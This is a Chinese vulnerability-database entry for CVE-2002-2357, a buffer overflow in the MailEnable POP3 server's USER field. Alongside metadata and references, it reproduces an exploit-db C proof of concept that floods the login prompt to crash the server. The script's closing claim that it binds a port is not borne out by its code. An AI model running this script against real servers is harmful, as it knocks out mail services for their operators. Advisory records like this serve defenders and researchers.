MailEnable Email Server远程缓冲区溢出漏洞

MailEnable Email Server远程缓冲区溢出漏洞

漏洞ID 1107102 漏洞类型 缓冲区溢出
发布时间 2002-11-18 更新时间 2002-12-31
图片[1]-MailEnable Email Server远程缓冲区溢出漏洞-安全小百科CVE编号 CVE-2002-2357
图片[2]-MailEnable Email Server远程缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200212-207
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/22023
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-207
|漏洞详情
MailEnable是一款基于WEB的邮件服务程序。MailEnablePOP3服务器对用户登录字段数据缺少正确检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以POP3进程权限在系统上执行任意指令。攻击者可以连接有此漏洞的MailEnablePOP3服务程序,并在USER提示字段输入超长的字符串,可触发缓冲区溢出,精心构建提交数据可能以POP3进程权限在系统上执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/6197/info

A buffer overflow vulnerability has been reported for MailEnable's POP3 server. The vulnerability is due to insufficent bounds checking of the USER login field.

An attacker can exploit this vulnerability by connecting to a vulnerable MailEnable server and sending an overly long string as the value for the USER login prompt. This will trigger the buffer overflow condition. 

/*
*
* Written by redsand
* <[email protected]>
* Vuln. date found: November 18. 2002
* Vulnerable: Windows 9x/NT/XP MailEnable POP Server Version 1.02
*
* Usage: ./mailenable-dos.1.3 <host> [port] [port] is optional. default is in the #define (port 110)
* Need to Enable [offset] in final release.
*
* Proof of Concept code (PoC)
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 110

char string[2010];
char death[2500];
char top[5], end[50];
char tag[] = "::redsand.net::";

int main(int argc, char *argv[]) {

  int sockfd, port, i;
  char buf[2500];
  struct hostent *ha;
  struct sockaddr_in sa;
  if (argc < 2 ) {
printf("MailEnable POP Server Version 1.02 DoSn:: redsand <at> redsand.netrnUsage: %s <host> <port>n", argv[0]);
    exit(0);
  }
if (argv[2]) {
port = atoi(argv[2]);
} else { port = PORT; }
for( i = 0; i <2009; i++) {
string[i] = 'A';
}

strcpy(top,"USER ");
strcpy(end,tag);
strcpy(death,top);
strcat(death,string);
strcat(death,end);

  if (!(ha = gethostbyname (argv[1])))
    perror ("gethostbyname");

  bzero (&sa, sizeof (sa));
  bcopy (ha->h_addr, (char *) &sa.sin_addr, ha->h_length);
  sa.sin_family = ha->h_addrtype;
  sa.sin_port = htons (port);

  if ((sockfd = socket (ha->h_addrtype, SOCK_STREAM, 0)) < 0) {
    perror ("socket");
    exit (1);
  }
 printf("MailEnable :: redsand <at> redsand.netrn+ connecting...n");
  if (connect (sockfd, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
    perror ("connect");
    exit (1);
  }
  printf("+ connectedn+ sending request to pop3 servern");
  send(sockfd, death, sizeof(death), 0);
  // read(sockfd, buf, 2050, 0);
    close(sockfd);
  printf("+ finishedn");
  printf("rrIf exploit worked, then it should bind port on 3879n");
}

/* redsand.net */
|参考资料

来源:BID
名称:6197
链接:http://www.securityfocus.com/bid/6197
来源:XF
名称:mailenable-pop3-server-dos(10652)
链接:http://www.iss.net/security_center/static/10652.php
来源:BUGTRAQ
名称:20021117MailEnablePOP3Serverremoteshutdown!:/-newest~(andprevious)bufferoverflow-
链接:http://archives.neohapsis.com/archives/bugtraq/2002-11/0236.html
来源:NSFOCUS
名称:3860
链接:http://www.nsfocus.net/vulndb/3860

相关推荐: Marc Logemann More.groupware Remote Arbitrary Code Execution Vulnerability

Marc Logemann More.groupware Remote Arbitrary Code Execution Vulnerability 漏洞ID 1102885 漏洞类型 Design Error 发布时间 2001-10-02 更新时间 200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享